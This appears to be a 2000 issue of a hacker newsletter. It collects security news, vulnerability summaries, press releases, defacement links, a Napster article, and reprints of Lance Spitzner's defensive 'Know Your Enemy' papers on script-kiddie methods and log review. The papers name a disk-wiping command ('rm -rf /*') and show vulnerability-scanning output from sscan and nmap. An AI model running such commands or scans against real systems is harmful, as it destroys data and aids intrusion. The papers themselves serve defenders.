LOVE LETTER CREATOR CHARGED
Onel de Guzman is charged with writing the Love Letter worm. The National
Bureau of Investigation will charge de Guzman with "traditional" crimes such
as theft and violation of a law that normally covers credit card fraud. The
maximum penalty is 20 years in prison.

COMPUTER ASSOCIATES REBUFFS SOPHOS ALLEGATIONS
Simon Perry, Computer Associates' vice president, told Newsbytes that he
viewed Sophos' comments as irrelevant, adding that the approach his firm
takes with warning customers about viruses is to warn them of any potential
problems, for whatever reason. "Our reporting of viruses to our customers
has drawn kudos, both from customers and the industry at large," he said,
adding that the company aims to quickly let people know what the latest
virus is and what the associated dangers are.
Link: http://www.computeruser.com/news/00/06/30/news19.html

STUDENT ADMITS GOVERNMENT ATTACKS
A university student admitted in Boston federal court to breaking into U.S.
government computers including Defense Department and NASA systems. Ikenna
Iffih, a student at Northeastern University's College of Computer Science,
pleaded guilty to a series of coast-to-coast cyber attacks before U.S.
District Judge Robert Keeton late on Thursday.
Link: http://www.wired.com/news/politics/0,1283,37352,00.html

SEGA DREAMCAST COPYRIGHT PROTECTION BROKEN
The Dreamcast game system has been viewed as one of the most secure digital
entertainment systems on the market. It looks like it is not so secure. A
group called Utopia has broken through the copyright protections of the
system.
Link: http://news.cnet.com/news/0-1005-200-2181596.html?tag=st.ne.1005.sndstry.ni

LEE ASHURST'S POINT OF VIEW
Lee Ashurst, accused of hacking into and sabotaging the Internet service
Etisalat, has filed a defamation suit in Dubai against them. He has also set
up a site with his opinion on the whole situation.
Link: http://www.supportlee.4mg.com/

ISSUE DISCLOSURE POLICY
Lewis Z. Koch did an article on Rain Forest Puppy's "issue disclosure
policy", a text dealing with reporting vulnerabilities to vendors. The first
version of this text file was sent to Bugtraq approximately 3 weeks ago.
Link: http://mcafee.snap.com/main/page/pcp/cd/0,85,-1716-1431464-397786,00.html

----------------------------------------------------------------------------

Security issues
---------------

All vulnerabilities are located at: http://net-security.org/text/bugs

----------------------------------------------------------------------------

IE 5 AND EXCEL 2000, POWERPOINT 2000 VULNERABILITY
Internet Explorer 5.01, Excel 2000 and PowerPoint under Windows 98 (suppose
other versions are also vulnerable, have not tested) allow executing
programs when viewing a web page or HTML email message - in the latter case
at least with IFRAME. This allows taking full control over the user's
computer.
Link: http://www.net-security.org/text/bugs/962198313,44285,.shtml

IE 5 AND ACCESS 2000 VULNERABILITY
Internet Explorer 5.01 and Access 2000 under Windows 98 (suppose other
versions are also vulnerable) allow executing programs when viewing a web
page or HTML email message (in the latter case with IFRAME). This allows
taking full control over the user's computer.
Link: http://www.net-security.org/text/bugs/962198423,71032,.shtml

PATCH FOR "ACTIVE SETUP DOWNLOAD" PROBLEM
Microsoft has released a patch that eliminates a security vulnerability in
an ActiveX control that ships with Microsoft Internet Explorer. The
vulnerability could be used to overwrite files on the computer of a user who
visited a malicious web site operator's site.
Link: http://www.net-security.org/text/bugs/962463758,19962,.shtml

DOS IN MICROSOFT WINDOWS 2000 SERVER
Multiple ports and protocols on Microsoft Windows 2000 Server are
susceptible to a simple network attack which raises CPU utilization on
Windows 2000 Server to 100%.
Link: http://www.net-security.org/text/bugs/962540960,71332,.shtml

DOS IN CHECK POINT FIREWALL-1 ON WINDOWS NT
The SMTP Security Server component of Check Point Firewall-1 4.0 and 4.1 is
vulnerable to a simple network-based attack which raises the firewall load
to 100%.
Link: http://www.net-security.org/text/bugs/962541047,22517,.shtml

DOS IN MICROSOFT WINDOWS 2000 TELNET SERVER
Microsoft Windows 2000 Server is supplied with a Telnet server for remote
console access. A Denial of Service vulnerability exists in this server
which may be exploited by a local or remote attacker.
Link: http://www.net-security.org/text/bugs/962541114,23868,.shtml

BOA WEBSERVER LOCAL PATH PROBLEM
BOA Webserver is a small fast webserver that supports only basic functions.
It beats the pants off Apache for speed; however, the only problem is that
it does not do any URL parsing.
It admits this (somewhere on the page it says you better lock down your file
system real good), but the problem still remains. Basically you can specify
the full local path to any file on a Boa webserver and out it spits the
contents. i.e.
Link: http://www.net-security.org/text/bugs/962541273,5729,.shtml

[MANDRAKE] WU-FTPD UPDATE
Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC
implementation. Because of user input going directly into a format string
for a *printf function, it is possible to overwrite important data, such as
a return address, on the stack.
Link: http://www.net-security.org/text/bugs/962578199,96510,.shtml

[MANDRAKE] DHCP UPDATE
The OpenBSD team discovered a vulnerability in the dhcp client that allows
for remote exploitation by a corrupt dhcp server (or an attacker pretending
to be a dhcp server). If this vulnerability is exploited, root access can be
gained remotely on the host running the dhcp client. The problem is that
input is not checked and, as a result, it is possible to execute commands
remotely when the network config files are being written on the dhcp client.
Link: http://www.net-security.org/text/bugs/962578323,92268,.shtml

----------------------------------------------------------------------------

Security world
--------------

All press releases are located at: http://net-security.org/text/press

----------------------------------------------------------------------------

CENTRAL COMMAND ANNOUNCES PERFECTSUPPORT - [26.06.2000]
Today Central Command announced PerfectSupport, a new support service that
provides mission critical antivirus support and services. This subscription
service provides maximum virus protection to all organizations where virus
prevention and malicious application recovery is critical to their
operation. This premium service includes unlimited toll-free phone support
at any time and priority access to Central Command's Emergency Virus
Response Team during virus outbreaks.
Press release: < http://www.net-security.org/text/press/962040421,209,.shtml >

----------------------------------------------------------------------------

eWEEK CHALLENGES PUBLIC TO HACK THEM - [27.06.2000]
In its second major test of Web enterprise security, Labs Interactive, by
the editors of eWEEK, in conjunction with digital security services firm
Guardent, has created an e-commerce site and is challenging the public to
hack the site at openhack.com. Prize money of up to $2,500 will be awarded
to the first hacker to crack the site, which mimics a true corporate
e-commerce network, including e-mail, Web server, a database application,
remote access and five different operating systems. The challenge goes live
on June 26 and runs through the first two weeks of July.
Press release: < http://www.net-security.org/text/press/962098245,92659,.shtml >

----------------------------------------------------------------------------

GENUITY ANNOUNCES ENHANCED FIREWALL SERVICES - [27.06.2000]
Genuity Inc., formerly GTE Internetworking, today announced significant new
enhancements to the Site Patrol for FireWall-1 family of managed Internet
security services. Designed to secure high-volume enterprise intranets and
e-business extranets, new leading-edge features include the industry's first
High Availability managed firewall service. Site Patrol uses StoneSoft
Corporation's award-winning StoneBeat clustering technology with dynamic
load balancing to ensure maximum availability, scalability and performance.
In addition, a hot standby, High Availability option is also available for
organizations with fixed throughput requirements.
Press release: < http://www.net-security.org/text/press/962098361,38122,.shtml >

----------------------------------------------------------------------------

SECOND ANNUAL GLOBAL E-SECURITY CONVENTION - [28.06.2000]
Baltimore Technologies, a global leader in e-security solutions, today
announced the company's second annual Global e-Security Convention, focusing
on the use of e-security to deliver secure, trusted business models and
applications. Global e-Security 2000 is the most authoritative convention
set up to educate delegates on the business and technology benefits of
e-security. This convention will highlight PKI technology as an integral
component of secure e-business with the ability to unleash endless
opportunities for companies worldwide.
Press release: < http://www.net-security.org/text/press/962198599,45835,.shtml >

----------------------------------------------------------------------------

CA ANNOUNCES ETRUST SINGLE SIGN-ON 6.5 - [28.06.2000]
Computer Associates International, Inc., the world's leading eBusiness
solutions provider, today announced the general availability (GA) of eTrust
Single Sign-On (SSO) 6.5, the industry-leading secured access solution. The
latest version of eTrust SSO provides a comprehensive solution for
eBusinesses desiring integrated SSO and access control capabilities for
existing client/server and Web-based applications from a single product.
Press release: < http://www.net-security.org/text/press/962198695,70218,.shtml >

----------------------------------------------------------------------------

CYLINK ANNOUNCES GENERAL RELEASE OF NETHAWK - [29.06.2000]
On June 23, Cylink Corporation began customer shipments of its NetHawk, the
company's new high-speed virtual private network (VPN) appliance for secure,
site-to-site Internet communications. NetHawk is an Internet Protocol
Security (IPSec) solution that transparently integrates into the network,
providing an enterprise-strength combination of performance and
manageability.
Press release: < http://www.net-security.org/text/press/962275562,59227,.shtml >

----------------------------------------------------------------------------

FREE LINUX FIREWALL RELEASED TO PUBLIC - [01.07.2000]

NetMaster Networking Solutions, Inc. of Chilliwack, B.C., announced today they are making their Gateway Guardian Personal Edition firewall software available FREE for personal and non-profit use. It can be downloaded off their web site, www.GatewayGuardian.com, and also from over 100 download sites across the Internet. "We have done this to meet the increasing demand for firewall protection from families adopting high-speed cable, and DSL internet connections across Canada and the U.S.," said Steve Hemenway, NetMaster's Vice President of Sales and Marketing.

Press release: < http://www.net-security.org/text/press/962464441,94200,.shtml >

----------------------------------------------------------------------------

INTERPOL AND ATOMICTANGERINE ANNOUNCE ALLIANCE - [01.07.2000]

Companies worldwide will have new access to superior intelligence in their war against global cyber crime as a result of an innovative alliance between the private and public sector. Working directly with Menlo Park-based venture consulting powerhouse AtomicTangerine, famous Lyon, France-based Interpol has initiated a special relationship designed to deliver advanced intelligence collected by the law enforcement organization to corporations worldwide. Interpol is the world's pre-eminent organization supporting the prevention and detection of international crime.
Press release: < http://www.net-security.org/text/press/962550257,75895,.shtml >

----------------------------------------------------------------------------

Defaced archives
------------------------

[25.06.2000] - Washington State Department of Social and Health Services
Original: http://maa.dshs.wa.gov/
Defaced: http://www.attrition.org/mirror/attrition/2000/06/25/maa.dshs.wa.gov/

[26.06.2000] - Epson
Original: http://www.epson.com.cn/
Defaced: http://www.attrition.org/mirror/attrition/2000/06/26/www.epson.com.cn/

[27.06.2000] - London Fire Brigade
Original: http://www.londonfirebrigade.gov.uk/
Defaced: http://www.attrition.org/mirror/attrition/2000/06/27/londonfirebrigade.gov.uk/

[27.06.2000] - Counterpart Consortium Turkmenistan
Original: http://www.cpart.org
Defaced: http://www.attrition.org/mirror/attrition/2000/06/27/www.cpart.org/

[28.06.2000] - LSU School of Social Work
Original: http://www.socialwork.lsu.edu/
Defaced: http://www.attrition.org/mirror/attrition/2000/06/28/www.socialwork.lsu.edu/

[29.06.2000] - The Bloodhound Gang Online
Original: http://www.bloodhoundgang.com/
Defaced: http://www.attrition.org/mirror/attrition/2000/06/29/www.bloodhoundgang.com/

[29.06.2000] - HyperHog Internet Service
Original: http://www.hyperhog.net/
Defaced: http://www.attrition.org/mirror/attrition/2000/06/29/www.hyperhog.net/

[30.06.2000] - Banco Union Colombiano
Original: http://www.bancounion.com.co/
Defaced: http://www.attrition.org/mirror/attrition/2000/06/30/www.bancounion.com.co/

[30.06.2000] - Philippine Association for Open Computing
Original: http://www.passoc.org/
Defaced: http://www.attrition.org/mirror/attrition/2000/06/30/www.passoc.org/

[30.06.2000] - The Undersecretariat of Foreign Trade Turkey
Original: http://www.foreigntrade.gov.tr/
Defaced: http://www.attrition.org/mirror/attrition/2000/06/30/www.foreigntrade.gov..tr/

[01.07.2000] - White Force
Original: http://www.whiteforce.com/
Defaced: http://www.attrition.org/mirror/attrition/2000/07/01/www.whiteforce.com/

[01.07.2000] - College of New Caledonia
Original: http://www.cnc.bc.ca/
Defaced: http://www.attrition.org/mirror/attrition/2000/07/01/www.cnc.bc.ca/

HNS staff
staff@net-security.org
http://net-security.org

---------------------------------------------------------------------
To unsubscribe, e-mail: news-unsubscribe@net-security.org
For additional commands, e-mail: news-help@net-security.org

@HWA

301.0 [MM] NAPSTER GETS ORDERED TO BE SHUT DOWN IS THE FIGHT LOST?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sources: Multiple

ZDNet Article: Judge slams door on Napster
Thu, 27 Jul 2000 08:56:41 GMT
Lisa M. Bowman

US district judge Marilyn Hall Patel showed little sympathy for the popular song-swap site, saying it was encouraging piracy by millions of users

A federal judge on Wednesday issued a surprise injunction requiring Napster to block all copyrighted music on its site. The injunction will go into effect midnight Friday, local time. The recording industry must pay a $5m bond against any financial losses Napster might suffer by being shut down pending trial.

Saying the recording industry is likely to prevail in its copyright infringement case against the popular song-sharing company, US district judge Marilyn Patel's ruling could, in effect, shut down the free music swapping service.

Patel ruled unexpectedly from the bench immediately after a two-hour hearing, telling a packed courtroom her order would keep Napster from "copying or assisting or enabling or contributing to the copy or duplication of all copyrighted songs and musical compositions of which the plaintiffs hold rights".

The Recording Industry Association of America filed a lawsuit in December, just five months after Napster's launch, saying the company's song-sharing service promotes copyright infringement. The case is scheduled for trial later this year.
Patel denied a motion by Napster attorney David Boies, which asked her to delay the order. Outside the courtroom, Boies vowed an appeal and, separately, Napster executives said the company would file papers Thursday morning.

Boies said the order was "impossible to implement or obey" since Napster has not received a list of songs it is required to block. And, while Patel's order stopped short of pulling the plug, Boies said the injunction could cripple the business.

"Between now and the actual trial, Napster's service obviously is going to be seriously curtailed [if the injunction isn't lifted]", Boies said, adding that a settlement, though possible, was unlikely.

RIAA general counsel Cary Sherman applauded the order, saying that it laid the groundwork for legal music downloads and that it could send a message to other song-swapping firms. In issuing the order, Patel denied virtually every defence claim by Napster. The RIAA recently sued another file sharing company, Scour, on similar grounds.

"Our hope is that the court's decision, which is very, very clear, and very, very strong, will send a very clear signal to all those other companies," Sherman said.

She said swapping songs with Napster wasn't protected under the Audio Home Recording Act, as the defence had argued, in part because it involved so many people. She added that evidence so far in the case, including internal Napster memos, had convinced her that most people used the service primarily to download copyrighted materials.

Patel bought the recording industry's argument that Napster resisted complying with federal law by failing to pay royalties to copyright owners. Recording industry attorney Russell Frackman told the judge that 20 million songs were downloaded daily, of which roughly 90 percent were copyrighted. He said that Napster planned to have a user base of 75 million users by the end of the year.
"The record companies not only get no return on their investment, but Napster is piggy-backing," Frackman said, adding that reining in the company would only become more difficult in the future.

"The longer this goes on, your honour, the more impossible it will be for us and the court to do anything realistic," he continued, asking her to "nip this in the bud". He also said studies showing that CD sales were rising even as Napster gained momentum were "weak" and "irrelevant".

At some points Patel was clearly irritated at Napster attorneys, challenging many of their assertions and asking them many more questions than she had asked the recording industry attorneys. After reading internal Napster planning documents related to the case, "Pirating be damned is pretty much the sense one gets," she said. "Free music for the people!" she quipped, prompting chuckles in the courtroom.

Later, Patel abruptly ended Napster's presentation after an exasperated Napster attorney, Daniel Johnson, told her "you're not listening". "You may have a seat," Patel shot back. And he did.

After her ruling, Patel gave both sides a chance to respond. Boies asked Patel directly if she intended to close Napster down. "I'm not ordering them to shut their business down. I want to make that clear," Patel said.

During the hearing, Patel seemed not to understand that Napster was not the only site that allowed users to download free music. When Napster attorneys pointed out that people could swap songs through other -- though decidedly less popular -- means, such as chat rooms and Gnutella, Patel challenged them, saying "but you have to pay". At one point, Patel asked Johnson, "What about Gnutella, do you have to pay?" Johnson told her she did not.

On Wednesday evening, company founder Shawn Fanning and chief exec Hank Barry held a brief Webcast to address user concerns. "We will keep fighting for Napster and your right to share music over the Internet," Fanning said.
Barry said the company would work through the night on a solution to an injunction he said could shut the service down in its current form. "Although we sharply and firmly disagree with the judge's decision, we understand the basis for it and we plan to comply."

David Coursey reckons at the end of the day, history will judge that Napster wasn't an advocate of "the Internet should be free" but a greedy bunch of corporate raiders trying to make their fortune off the property of others.

HWA Says; "Fuck him and the horse he rode in on". I have, as a result of exposure to material I otherwise would not have been able to sample, purchased MORE CDs than I previously did. A true fan wants a piece of their idol, and that includes the crappy jewel case box and the cool colour booklet that is included with the CD set. - Cruciphux

@HWA

302.0 [IND] Paper: Know your enemy #1 by Lance Spitzner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This is an excellent series by Lance Spitzner. I've included the entire set and supporting logs and docs where available. This is highly recommended reading for both hacker camps. - Ed

The Tools and Methodologies of the Script Kiddie
Know Your Enemy
Lance Spitzner
http://www.enteract.com/~lspitz/papers.html
Last Modified: 21 July, 2000

My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy is. This military doctrine readily applies to the world of network security. Just like the military, you have resources that you are trying to protect. To help protect these resources, you need to know who your threat is and how they are going to attack. This article, the first of a series, does just that: it discusses the tools and methodology of one of the most common and universal threats, the Script Kiddie. If you or your organization has any resources connected to the Internet, this threat applies to you.
Know Your Enemy: II focuses on how you can detect these threats, identify what tools they are using and what vulnerabilities they are looking for. Know Your Enemy: III focuses on what happens once they gain root. Specifically, how they cover their tracks and what they do next. Know Your Enemy: Forensics covers how you can analyze such an attack. Finally, Know Your Enemy: Motives, the result of a group project, uncovers the motives and psychology of some members of the black-hat community, in their own words.

Who is the Script Kiddie

The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company. Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching the entire Internet for that exploit. Sooner or later they find someone vulnerable. Some of them are advanced users who develop their own tools and leave behind sophisticated backdoors. Others have no idea what they are doing and only know how to type "go" at the command prompt. Regardless of their skill level, they all share a common strategy: randomly search for a specific weakness, then exploit that weakness.

The Threat

It is this random selection of targets that makes the script kiddie such a dangerous threat. Sooner or later your systems and networks will be probed; you cannot hide from them. I know of admins who were amazed to have their systems scanned when they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems were scanned by a script kiddie who happened to be sweeping that network block. If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed; anyone can use them.
A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us. With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed.

This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very systems that the script kiddies are searching for: the unprotected system that is easy to exploit, the easy kill.

The Methodology

The script kiddie methodology is a simple one. Scan the Internet for a specific weakness; when you find it, exploit it. Most of the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First, develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability.

For example, let's say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP addresses is built, the user would want to determine which systems were running Linux. Many scanners today can easily determine this by sending bad packets to a system and seeing how they respond, such as Fyodor's nmap. Then, tools would be used to determine what Linux systems were running imap. All that is left now is to exploit those vulnerable systems.

You would think that all this scanning would be extremely noisy, attracting a great deal of attention.
However, many people are not monitoring their systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single system they can exploit. Once they have exploited a system, they then use this system as a launching pad. They can boldly scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the black-hat will be held liable.

Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current imap vulnerability. However, let's say that a month from now a new Linux exploit is identified on a different port. Instead of having to build a new database (which is the most time consuming part), the user can quickly review his archived database and compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from each other. You can see examples of this in Know Your Enemy: Motives. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been scanned recently does not mean you are secure.

The more sophisticated black-hats implement trojans and backdoors once they compromise a system. Backdoors allow easy and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show up in any of the logs, system processes, or file structure. He builds a comfortable and safe home where he can blatantly scan the Internet. For more information on this, check out Know Your Enemy: III.

These attacks are not limited to a certain time of the day. Many admins search their log entries for probes that happen late at night, believing this is when black-hats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no idea when the probe will happen.
Also, these attacks are launched throughout the world. Just as the Internet knows no geographical bounds, it knows no time zones. It may be midnight where the black-hat is, but it is 1pm for you.

This methodology of scanning for vulnerable systems can be used for a variety of purposes. Recently, new Denial of Service attacks have been reported, specifically DDoS (Distributed Denial of Service attacks). These attacks are based on a single user controlling hundreds, if not thousands of compromised systems throughout the world. These compromised systems are then remotely coordinated to execute Denial of Service attacks against a victim or victims. Since multiple compromised systems are used, it is extremely difficult to defend against and identify the source of the attack. To gain control of so many systems, script kiddie tactics are often employed. Vulnerable systems are randomly identified and then compromised to be used as DDoS launching pads. The more systems compromised, the more powerful the DDoS attack. One example of such an attack is 'stacheldraht'. To learn more about Distributed Denial of Service attacks and how to protect yourself, check out Paul Ferguson's site Denialinfo.

The Tools

The tools used are extremely simple in use. Most are limited to a single purpose with few options. First come the tools used to build an IP database. These tools are truly random, as they indiscriminately scan the Internet. For example, one tool has a single option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tool builds an IP database by conducting zone transfers of the domain name and all sub-domains. Users have built databases with over 2 million IPs by scanning the entire .com or .edu domain.
Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, operating system, or services running on the system. Once the vulnerable systems have been identified, the black-hat strikes. For a better understanding of how these tools are used, check out Know Your Enemy: Forensics.

How to Protect Against This Threat

There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill; they are looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both www.cert.org and www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq (archived at securityfocus.com) is one of the best sources of information. Another way to protect yourself is to run only the services you need. If you do not need a service, turn it off. If you do need a service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris, Armoring Linux or Armoring NT.

As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on them. I highly recommend upgrading to the latest version of BIND (software used for Domain Name Service), which you can find at www.isc.org/bind.html.

Last, watch for your systems being probed. Once identified, you can track these probes and gain a better understanding of the threats to your network and react to these threats.

Conclusion

The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value. Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems against this threat.
@HWA

303.0 [IND] Paper: Know your enemy #2 by Lance Spitzner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Tracking their moves
Know Your Enemy: II
Lance Spitzner
http://www.enteract.com/~lspitz/papers.html
Last Modified: July 7, 2000

This article is the second of a three part series. In the first article, Know Your Enemy, we covered the tools and methodologies of the Script Kiddie. Specifically, how they probe for vulnerabilities and then attack. The third paper covers what script kiddies do once they gain root. Specifically, how they cover their tracks and what they do next. This, the second paper, will cover how to track their movements. Just as in the military, you want to track the bad guys and know what they are doing. We will cover what you can, and cannot, determine with your system logs. You may be able to determine if you are being probed, what you were being probed for, what tools were used, and if they were successful. The examples provided here focus on Linux, but can apply to almost any flavor of Unix. Keep in mind, there is no guaranteed way to track the enemy's every step. However, this article is a good place to start.

Securing Your Logs

This article is not on Intrusion Detection; there are a variety of excellent sources that cover IDS. If you are interested in intrusion detection, I recommend checking out applications such as Network Flight Recorder or snort. This article focuses on intelligence gathering. Specifically, how to figure out what the enemy is doing by reviewing your system logs. You will be surprised how much information you will find in your own log files. However, before we can talk about reviewing your logs, we first have to discuss securing your system logs. Your log files are worthless if you cannot trust the integrity of them. The first thing most black-hats do is alter log files on a compromised system.
There are a variety of rootkits that will wipe out their presence from log files (such as cloak), or alter logging altogether (such as trojaned syslogd binaries). So, the first step to reviewing your logs is securing your logs. This means you will need to use a remote log server. Regardless of how secure your system is, you cannot trust your logs on a compromised system. If nothing else, the black-hat can simply do a rm -rf /* on your system, wiping your hard drive clean. This makes recovering your logs somewhat difficult. To protect against this, you will want all your systems to log traffic both locally and to a remote log server.

I recommend making your log server a dedicated system, i.e. the only thing it should be doing is collecting logs from other systems. If money is an issue, you can easily build a linux box to act as your log server. This server should be highly secured, with all services shut off, allowing only console access (see Armoring Linux for an example). Also, ensure that port 514 UDP is blocked or firewalled at your Internet connection. This protects your log server from receiving bad or un-authorized logging information from the Internet.

For those of you who like to get sneaky, something I like to do is recompile syslogd to read a different configuration file, such as /var/tmp/.conf. This way the black-hat does not realize where the real configuration file is. This is simply done by changing the entry "/etc/syslog.conf" in the source code to whatever file you want. We then set up our new configuration file to log both locally and to the remote log server (see example). Make sure you maintain a standard copy of the configuration file, /etc/syslog.conf, which points to all local logging. Even though this configuration file is now useless, it will keep the black-hat from realizing the true destination of our remote logging.

Another option for your systems is to use a secure method of logging.
One option is to replace your syslogd binary with something that has integrity checking and a greater breadth of options, such as syslog-ng, which you can find at http://www.balabit.hu/products/syslog-ng.html

Most of the logs we will use are the ones stored on the remote log server. As mentioned earlier, we can be fairly confident of the integrity of these logs since they are on a remote and secured system. Also, since all systems are logging to a single source, it is much easier to identify patterns in these logs. We can quickly review what's happening to all the systems in one source. The only time you would want to review logs stored locally on a system is to compare them to what the log server has. You can determine if the local logs have been altered by comparing them to the remote logs.

Pattern Matching

By looking at your log entries, you can usually determine if you are being port scanned. Most Script Kiddies scan a network for a single vulnerability. If your logs show most of your systems being connected to from the same remote system, on the same port, this is most likely an exploit scan. Basically, the enemy has an exploit for a single vulnerability, and they are scanning your network for it. When they find it, they exploit it. For most Linux systems, TCP Wrappers is installed by default. So, we would find most of these connections in /var/log/secure. For other flavors of Unix, we can log all inetd connections by launching inetd with the "-t" flag, facility daemon. A typical exploit scan would look like something below. Here we have a source scanning for the wu-ftpd vulnerability.
/var/log/secure

Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200

Here we see the source 192.168.11.200 scanning our network. Notice how the source sequentially scans each IP (this is not always the case). This is the advantage of having a log server: you can more easily identify patterns in your network since all the logs are combined. The repeated connections to port 21, ftp, indicate they were most likely looking for the wu-ftpd exploit. We have just determined what the black-hat is looking for. Often, scans tend to come in phases. Someone will release code for an imap exploit, and you will suddenly see a rush of imap scans in your logs. The next month you will be hit by ftp. An excellent source for current exploits is http://www.cert.org/advisories/

Sometimes, tools will scan for a variety of exploits at the same time, so you may see a single source connecting to several ports. Keep in mind, if you are not logging the service, you will not know if you are scanned for it. For example, most rpc connections are not logged. However, many services can simply be added to /etc/inetd.conf for logging with TCP Wrappers. For example, you can add an entry in /etc/inetd.conf for NetBus. You can define TCP Wrappers to safely deny and log the connections (see Intrusion Detection for more info on this).

What's the Tool?

Sometimes you can actually determine the tools being used to scan your network. Some of the more basic tools scan for a specific exploit, such as ftp-scan.c. If only a single port or vulnerability is being probed on your network, they are most likely using one of these "single mission" tools.
However, there exist tools that probe for a variety of vulnerabilities or weaknesses; the two very popular tools are sscan by jsbach and nmap by Fyodor. I've selected these two tools because they represent the two "categories" of scanning tools. I highly recommend you run these tools against your own network, you may be surprised by the results :)

NOTE: The tool sscan is now over a year old and severely out of date. sscan is discussed only as an example. For scanning your own network for vulnerabilities, I highly recommend the tool Nessus.

sscan represents the "all purpose" Script Kiddie scanning tool. It probes a network for a set of specific vulnerabilities. It is customizable, allowing you to add probes for new exploits. You just give the tool a network and network mask, and it does the rest for you. However, the user must be root to use it. The output is extremely easy to interpret (hence making it so popular): it gives a concise summary of many vulnerable services. All you have to do is run sscan against a network, grep for the word "VULN" in the output, and then run the "exploit du jour". Below is an example of sscan run against the system mozart (172.17.6.30).

otto #./sscan -o 172.17.6.30
--------------------------<[ * report for host mozart *
<[ tcp port: 80 (http) ]>
<[ tcp port: 23 (telnet) ]>
<[ tcp port: 143 (imap) ]>
<[ tcp port: 110 (pop-3) ]>
<[ tcp port: 111 (sunrpc) ]>
<[ tcp port: 79 (finger) ]>
<[ tcp port: 53 (domain) ]>
<[ tcp port: 25 (smtp) ]>
<[ tcp port: 21 (ftp) ]>
--<[ *OS*: mozart: os detected: redhat linux 5.1
mozart: VULN: linux box vulnerable to named overflow.
-<[ *CGI*: 172.17.6.30: tried to redirect a /cgi-bin/phf request.
-<[ *FINGER*: mozart: root: account exists.
--<[ *VULN*: mozart: sendmail will 'expn' accounts for us
--<[ *VULN*: mozart: linux bind/iquery remote buffer overflow
--<[ *VULN*: mozart: linux mountd remote buffer overflow
---------------------------<[ * scan of mozart completed *

Nmap represents the "raw data" tool set. It doesn't tell you what vulnerabilities exist; rather, it tells you what ports are open, and you determine the security impact. Nmap has quickly become the port scanner of choice, and with good reason. It takes the best of a variety of port scanners and puts all their functionality into a single tool, including OS detection, various packet assembly options, both UDP and TCP scanning, randomization, etc. However, you need networking skills to use the tool and interpret the data. Below is an example of nmap run against the same system.

otto #nmap -sS -O 172.17.6.30

Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on mozart (172.17.6.30):
Port    State       Protocol  Service
21      open        tcp       ftp
23      open        tcp       telnet
25      open        tcp       smtp
37      open        tcp       time
53      open        tcp       domain
70      open        tcp       gopher
79      open        tcp       finger
80      open        tcp       http
109     open        tcp       pop-2
110     open        tcp       pop-3
111     open        tcp       sunrpc
143     open        tcp       imap2
513     open        tcp       login
514     open        tcp       shell
635     open        tcp       unknown
2049    open        tcp       nfs

TCP Sequence Prediction: Class=truly random
                         Difficulty=9999999 (Good luck!)
Remote operating system guess: Linux 2.0.35-36

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds

By reviewing your logs, you can determine which of these tools were used against you. To do this, you have to understand how the tools work.
